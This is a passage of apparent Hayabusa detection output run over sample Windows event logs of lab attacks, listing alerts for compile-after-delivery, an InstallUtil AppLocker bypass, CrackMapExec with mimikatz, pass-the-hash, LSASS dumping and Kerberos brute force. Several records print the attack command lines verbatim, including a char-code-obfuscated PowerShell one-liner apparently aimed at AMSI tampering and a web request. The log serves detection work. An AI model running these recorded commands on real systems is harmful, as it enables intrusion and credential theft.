+09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\CSCFD9BAF75EA53488BBE2F1273837CC796.TMP | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | PID: 2604 | PGUID: 510C1E8A-036D-6196-6801-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.795 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CVTRES.EXE-BBD3ED93.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:29.809 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\CSC.EXE-B6D5E435.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:30.866 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | 
SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\svchost.exe | PID: 748 | PGUID: 510C1E8A-EF18-6195-0F00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:35.935 +09:00,PC-01.cybercat.local,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | SetValue: HKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1448793622-2040000875-2550846437-1103\\Device\HarddiskVolume3\Windows\System32\dllhost.exe: Binary Data | Process: C:\Windows\system32\DllHost.exe | PID: 2348 | PGUID: 510C1E8A-036E-6196-6A01-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:46.157 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:40:46.404 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx 2021-11-18 16:42:34.415 
+09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:34.416 +09:00,PC-01.cybercat.local,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1543,technique_name=Service Creation | CreateKey: HKLM\System\CurrentControlSet\Services\ClipSVC\Parameters | Process: C:\Windows\System32\svchost.exe | PID: 5672 | PGUID: 510C1E8A-0348-6196-6701-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1218.004,technique_name=InstallUtil | Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: CYBERCAT\pc1-user | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x678fe | PID: 816 | PGUID: 510C1E8A-03FE-6196-7101-000000000F00 | Hash: SHA1=25F66231385528D9F0E14546E2132AC486CB6955,MD5=964D5013C1EC42371AD135E02221A704,SHA256=19C86A9315EECCBB480BA6C48711EE24EA24EE97E27C1E1EEAC8B63D01A71D9F,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,medium,Evas,Suspicious Execution of InstallUtil Without 
Log,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:04.979 +09:00,PC-01.cybercat.local,11,medium,,File Created_Sysmon Alert,"technique_id=T1047,technique_name=File System Permissions Weakness | Path: C:\Windows\Prefetch\INSTALLUTIL.EXE-9953E407.pf | Process: C:\Windows\System32\svchost.exe | PID: 1128 | PGUID: 510C1E8A-EF1A-6195-1A00-000000000F00",../hayabusa-rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:22.487 +09:00,PC-01.cybercat.local,11,info,,File Created,Path: C:\Users\pc1-user\Desktop\sysmon.evtx | Process: C:\Windows\system32\mmc.exe | PID: 3116 | PGUID: 510C1E8A-FFD9-6195-4401-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-18 16:43:22.705 +09:00,PC-01.cybercat.local,23,info,,Deleted File Archived,C:\Users\pc1-user\AppData\Roaming\Microsoft\Windows\Recent\sysmon.evtx.lnk | Process: C:\Windows\Explorer.EXE | User: CYBERCAT\pc1-user | PID: 3384 | PGUID: 510C1E8A-EF2F-6195-6200-000000000F00,../hayabusa-rules/hayabusa/sysmon/events/23_DeletedFileArchived.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx 2021-11-23 18:26:30.059 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: | IP Addr: 10.23.123.11 | LID: 
0x8157add,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157afc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.121 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b29,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.137 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.168 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b4e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated 
Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.246 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b70,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.309 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157b8f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.371 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8157bac,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.635 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 
115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: FS03VULN$ | LID: 0x3e4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:30.651 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -exec bypass -noni -nop -w 1 -C "" & ( $pSHomE[4]+$pshome[30]+'x')(""$( seT-VariaBLe 'OFs' '') ""+[sTRING]((91 ,78,101 ,116, 46, 83, 101 ,114, 118, 105,99 , 101,80 , 111,105,110 ,116,77,97,110, 97,103,101,114,93,58, 58 , 83 ,101, 114, 118, 101 ,114, 67,101,114 , 116 , 105,102 , 105 ,99, 97 ,116 , 101,86,97 ,108,105 ,100 , 97, 116, 105 ,111 ,110 , 67, 97 , 108 ,108 , 98,97 , 99 ,107,32 ,61, 32 ,123,36 ,116,114 , 117,101 ,125 , 10,116 , 114 , 121, 123 ,10 , 91 , 82 ,101, 102 ,93,46 ,65 ,115, 115, 101,109, 98 , 108 ,121,46,71, 101 , 116,84 , 121 ,112, 101,40 ,39 ,83 ,121, 115,39, 43, 39 ,116,101,109 , 46 , 77 ,97,110 , 39 , 43 , 39,97, 103 , 101,109 , 101,110 ,116 , 46 , 65, 117, 116 , 39, 43,39,111 ,109,97 ,116,105, 111, 110,46 ,65, 109,39,43,39 , 115, 105 ,85 ,116 , 39 ,43 , 39 , 105 ,108,115 , 39, 41, 46 ,71 ,101,116 ,70 , 105 , 101, 108 , 100,40,39 ,97 , 109, 39 ,43, 39 ,115,105,73,110 ,105, 39, 43, 39, 116 ,70 ,97 ,105 ,108 ,101, 100,39,44, 32 ,39 , 78 ,111, 110 , 80 , 39,43,39 , 117 ,98, 108 ,105,99 , 44 , 83, 116 , 97 ,39,43,39 ,116 , 105 , 99 ,39,41,46 ,83,101 ,116,86,97, 108 , 117 ,101 , 40 ,36, 110 , 117,108,108,44 ,32 ,36 ,116 ,114,117,101,41, 10 ,125 , 99 ,97, 116, 99,104 ,123,125 , 10 ,91, 78 ,101, 116, 46, 83 , 101,114,118,105 , 99, 101 ,80 ,111 ,105 , 110 ,116 , 77 , 97,110, 97 , 103, 101 , 114, 93 ,58 , 58, 83 ,101,114 , 118 , 101, 114 ,67,101,114,116,105 , 102, 105,99 , 97 , 116,101 , 86 , 
105 ,111 , 110, 47, 120,45 , 119, 119 , 119 ,45 ,102,111, 114 ,109 ,45,117, 114, 108 , 101 ,110 ,99 , 111,100 , 101 ,100 , 39,10,36,98,121, 116, 101, 115 , 32 , 61 ,32 , 91 , 83, 121 , 115, 116,101 , 109 , 46, 84 ,101, 120 ,116 , 46, 69 , 110, 99 , 111 , 100 ,105 ,110 ,103,93 , 58 ,58, 65 , 83, 67, 73 , 73 , 46 ,71, 101 ,116 ,66 , 121 , 116,101 , 115 , 40 ,36 ,99 , 109 , 100, 41, 10, 36 , 114, 101, 113, 117 , 101, 115, 116, 46, 67 , 111, 110 ,116, 101,110 , 116 , 76, 101, 110,103,116 , 104 , 32, 61 ,32, 36 ,98 ,121,116, 101 ,115 ,46, 76, 101,110,103 ,116, 104,10, 36, 114 , 101, 113 , 117 ,101, 115, 116,83,116 ,114 ,101,97, 109 , 32,61 , 32 ,36, 114,101 ,113 , 117 , 101 , 115 , 116,46 , 71, 101, 116,82,101,113 ,117,101, 115 ,116 ,83, 116,114, 101, 97,109 , 40,41, 10, 36,114 , 101 , 113, 117, 101 ,115 , 116 , 83,116 ,114 , 101 , 97 ,109 , 46, 87,114 ,105 ,116,101,40,36 , 98 , 121 ,116 , 101 , 115 ,44,32 ,48 ,44, 32, 36 ,98, 121,116,101 ,115 , 46, 76 , 101,110 ,103,116, 104, 41 , 10 , 36,114,101,113 , 117,101 , 115, 116,83,116,114 , 101, 97 , 109 , 46,67, 108,111 ,115,101 , 40 ,41 , 10 , 36, 114 ,101, 113, 117, 101,115 , 116 , 46, 71 , 101 ,116,82 ,101 , 115, 112 ,111 , 110,115,101, 40 ,41) | % { ( [ChaR][InT]$_) } ) +""$(sEt-iTeM 'vArIaBLE:ofS' ' ' ) "" ) "" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x90c | User: admmig | LID: 0x8157bac",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-23 18:26:45.843 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\SYSTEM32\cmd.exe /c ""C:\tools\shell.cmd"" | Path: C:\Windows\System32\cmd.exe | PID: 0x214 | User: FS03VULN$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/4624,4674,4688- CrackMap Exec SMB mimikatz.evtx" 2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx 2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: 
SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,../hayabusa-rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: 
A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,../hayabusa-rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory 
Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx 2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : 
PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:sef/srey/admtest/vase/xt/s/ysy/vrat/yvsyv/xc/g/mgdi/rec/vga/ytuntsr/vdr/m,og/b aer/nd/test2/vt/gsdf/dyfgdhbn/tfay/bdcy/sgfg/vs/sfs/uydzry/bsfin/rey/syvsdy/tary/ryver/yvas/vay/tc/ugu/go/test1/xvtrz/ar/nini/tbyt/accrt/wyt IpAddress:::ffff:10.23.123.11 timeframe:24h",../hayabusa-rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,- 2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,../hayabusa-rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx 2021-12-02 23:48:16.338 